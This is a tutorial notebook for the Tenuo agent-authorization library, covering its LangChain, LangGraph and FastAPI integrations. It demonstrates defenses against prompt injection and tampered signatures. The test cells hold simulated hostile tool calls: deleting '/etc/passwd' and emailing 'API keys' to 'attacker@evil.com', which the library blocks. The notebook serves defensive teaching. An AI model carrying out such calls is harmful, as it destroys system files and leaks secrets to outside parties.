# 🔌 Tenuo Framework Integrations

Secure your AI agents at every layer. This notebook demonstrates Tenuo's integrations with:

1. **LangChain** - Protect tools from prompt injection
2. **LangGraph** - Secure multi-agent workflows  
3. **FastAPI** - Zero-trust API protection

**The key insight:** The same warrant that authorizes an LLM to call a tool also authorizes the API call that tool makes. End-to-end cryptographic authorization.

📘 **New to Tenuo?** Start with [Core Concepts](https://colab.research.google.com/github/tenuo-ai/tenuo/blob/main/notebooks/tenuo_demo.ipynb) first.

[GitHub](https://github.com/tenuo-ai/tenuo) | [Docs](https://tenuo.dev)

In [ ]:
# Install dependencies
!pip install -q tenuo[langchain,langgraph]==0.1.0a8 fastapi httpx

## Setup: Keys & Registry

In production, keys come from environment variables or secrets managers. For this demo, we generate them inline.

In [ ]:
from tenuo import Warrant, SigningKey, BoundWarrant, KeyRegistry

# Create identities
orchestrator_key = SigningKey.generate()  # High-privilege "admin"
worker_key = SigningKey.generate()        # Limited agent worker

# Register for LangGraph auto-lookup
registry = KeyRegistry.get_instance()
registry.register("worker-1", worker_key)

print("✓ Orchestrator key:", orchestrator_key.public_key)
print("✓ Worker key registered as 'worker-1'")

In [ ]:
# Define some "dangerous" tools
from langchain_core.tools import tool

@tool
def read_file(path: str) -> str:
    """Read a file from the filesystem."""
    return f"Contents of {path}: ..."

@tool  
def delete_file(path: str) -> str:
    """Delete a file. Dangerous!"""
    return f"Deleted {path}"

@tool
def send_email(to: str, subject: str, body: str) -> str:
    """Send an email to anyone."""
    return f"Email sent to {to}"

all_tools = [read_file, delete_file, send_email]
print("Tools defined:", [t.name for t in all_tools])

## 1. LangChain: Protecting Tools

The `protect()` function wraps any tool with authorization checks. Even if the LLM hallucinates or a prompt injection attacks the agent, unauthorized tool calls are blocked at runtime.

In [ ]:
from tenuo.langchain import protect

# Create a LIMITED warrant: read_file only, no delete, no email
limited_warrant = (Warrant.builder()
    .tool("read_file")  # Only allow read_file
    .issue(orchestrator_key)
)

# Bind the key for automatic PoP signing
bound = limited_warrant.bind_key(orchestrator_key)

# Wrap all tools with the limited warrant
protected_tools = protect(all_tools, bound_warrant=bound)

print("Protected", len(protected_tools), "tools with warrant:")
print("  Allowed tools:", limited_warrant.capabilities.get("tools", []))

In [ ]:
# Test 1: Allowed - read_file is in the warrant
print("1. Calling read_file (allowed):")
try:
    result = protected_tools[0].invoke({"path": "/tmp/safe.txt"})
    print(f"   ✅ {result}\n")
except Exception as e:
    print(f"   ❌ {e}\n")

# Test 2: Blocked - delete_file is NOT in the warrant  
print("2. Calling delete_file (blocked):")
try:
    result = protected_tools[1].invoke({"path": "/etc/passwd"})
    print(f"   ✅ {result}\n")
except Exception as e:
    print(f"   🛡️ BLOCKED: {type(e).__name__}\n")

# Test 3: Blocked - send_email is NOT in the warrant
print("3. Calling send_email (blocked):")
try:
    result = protected_tools[2].invoke({
        "to": "attacker@evil.com", 
        "subject": "Secrets",
        "body": "API keys..."
    })
    print(f"   ✅ {result}")
except Exception as e:
    print(f"   🛡️ BLOCKED: {type(e).__name__}")

## 2. LangGraph: Secure Multi-Agent Workflows

`TenuoToolNode` is a drop-in replacement for LangGraph's `ToolNode`. It automatically verifies warrants before executing any tool call.

In [ ]:
from typing import Annotated, TypedDict, List
import operator
from langchain_core.messages import BaseMessage, AIMessage
from langgraph.graph import StateGraph, END
from tenuo.langgraph import TenuoToolNode

# Agent state only needs messages - no warrant pollution!
class AgentState(TypedDict):
    messages: Annotated[List[BaseMessage], operator.add]

# Build a simple graph: entry -> tools -> end
workflow = StateGraph(AgentState)
workflow.add_node("tools", TenuoToolNode(all_tools))  # Drop-in secure!
workflow.set_entry_point("tools")
workflow.add_edge("tools", END)

graph = workflow.compile()
print("✓ Secure graph compiled")

In [ ]:
# Create a warrant that only allows read_file
worker_warrant = (Warrant.builder()
    .tool("read_file")
    .issue(worker_key)
)

# Simulate an LLM trying to call delete_file (e.g., prompt injection attack)
malicious_tool_call = AIMessage(
    content="",
    tool_calls=[{"name": "delete_file", "args": {"path": "/etc/passwd"}, "id": "call_1"}]
)

# Run the graph with the limited warrant
config = {
    "configurable": {
        "tenuo_key_id": "worker-1",       # Looks up worker_key from registry
        "tenuo_warrant": worker_warrant.to_base64()
    }
}

print("LLM requested: delete_file('/etc/passwd')")
print("Warrant allows: ['read_file'] only\n")

result = graph.invoke({"messages": [malicious_tool_call]}, config=config)
print("Tool response:", result["messages"][-1].content)

## 3. FastAPI: Zero-Trust API Protection

`TenuoGuard` is a FastAPI dependency that verifies warrants and PoP signatures on incoming requests. Perfect for securing the APIs that your agents call.

In [ ]:
from fastapi import FastAPI, Depends
from fastapi.testclient import TestClient
from tenuo.fastapi import configure_tenuo, TenuoGuard, SecurityContext

api = FastAPI()
configure_tenuo(api)  # Sets up error handlers

@api.get("/files/{path:path}")
def get_file(
    path: str,
    ctx: SecurityContext = Depends(TenuoGuard("read_file"))  # Requires read_file authority
):
    return {"path": path, "content": "...", "authorized": True}

client = TestClient(api)
print("✓ FastAPI app with TenuoGuard ready")


In [ ]:
# Create a client warrant with read_file permission
client_warrant = Warrant.builder().tool("read_file").issue(orchestrator_key)
client_bound = client_warrant.bind_key(orchestrator_key)

# Generate auth headers (automatically signs PoP for read_file)
headers = client_bound.auth_headers("read_file", {"path": "config.json"})
print("Generated headers:")
for k, v in headers.items():
    print(f"  {k}: {v[:40]}..." if len(v) > 40 else f"  {k}: {v}")

# Make authorized request
print("\nMaking request...")
response = client.get("/files/config.json", headers=headers)
print(f"Status: {response.status_code}")
print(f"Response: {response.json()}")


In [ ]:
# Try with tampered signature (simulating MITM attack)
print("Attempting request with tampered signature...")
bad_headers = headers.copy()
bad_headers["X-Tenuo-PoP"] = "tampered_signature_12345"

response = client.get("/files/config.json", headers=bad_headers)
print(f"Status: {response.status_code} (Forbidden)")
print(f"Error: {response.json()['detail']}")


---

## Summary

You've seen how Tenuo secures the **three layers** of AI agent architecture:

| Layer | Integration | What it does |
|-------|-------------|--------------|
| **Tool calls** | `protect()` | Blocks unauthorized LangChain tool invocations |
| **Agent graphs** | `TenuoToolNode` | Verifies warrants before any tool execution |
| **Network APIs** | `TenuoGuard` | Zero-trust verification of incoming requests |

**The key insight:** A single warrant flows through all layers. The orchestrator issues it, the agent carries it, and the API verifies it. End-to-end cryptographic authorization.

### Next Steps

- 🔐 [Core Concepts Notebook](https://colab.research.google.com/github/tenuo-ai/tenuo/blob/main/notebooks/tenuo_demo.ipynb) - Warrants, delegation, attenuation
- 📖 [Documentation](https://tenuo.dev)
- 🐙 [GitHub](https://github.com/tenuo-ai/tenuo) - Source & examples
